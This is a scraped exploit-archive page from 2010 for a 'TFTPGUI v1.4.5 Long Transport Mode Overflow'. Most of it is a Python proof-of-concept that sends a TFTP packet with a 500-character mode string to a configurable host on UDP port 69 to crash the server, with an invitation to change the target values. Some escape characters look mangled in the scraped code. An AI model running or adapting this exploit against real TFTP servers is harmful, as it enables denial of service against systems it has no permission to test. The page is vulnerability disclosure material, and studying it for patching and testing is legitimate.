Home / os / win7

TFTPGUI v1.4.5 Long Transport Mode Overflow

Posted on 02 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>TFTPGUI v1.4.5 Long Transport Mode Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================== TFTPGUI v1.4.5 Long Transport Mode Overflow =========================================== #!/usr/bin/python print &quot; #################################################################&quot; print &quot;## RedTeam Security ##&quot; print &quot;## TFTPGUI Long Transport Mode Overflow ##&quot; print &quot;## Version 1.4.5 ##&quot; print &quot;## LIST Vulnerability ##&quot; print &quot;## ##&quot; print &quot;## Jeremiah Talamantes ##&quot; print &quot;## labs@redteamsecure.com ##&quot; print &quot;################################################################# &quot; import socket import sys # Change these values to suit your needs host = '192.168.1.108' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print &quot;Error: unable to connect.&quot; sys.exit(1) # Creating the overly long transport mode string fn = &quot;A&quot; md = &quot;A&quot; * 500 stuff = &quot;x00x02&quot; + fn + &quot;&quot; + md + &quot;&quot; # Send data s.sendto(stuff, (host, port)) print &quot;Check to see if TFTPGUI is still running...&quot; # End # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-02]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP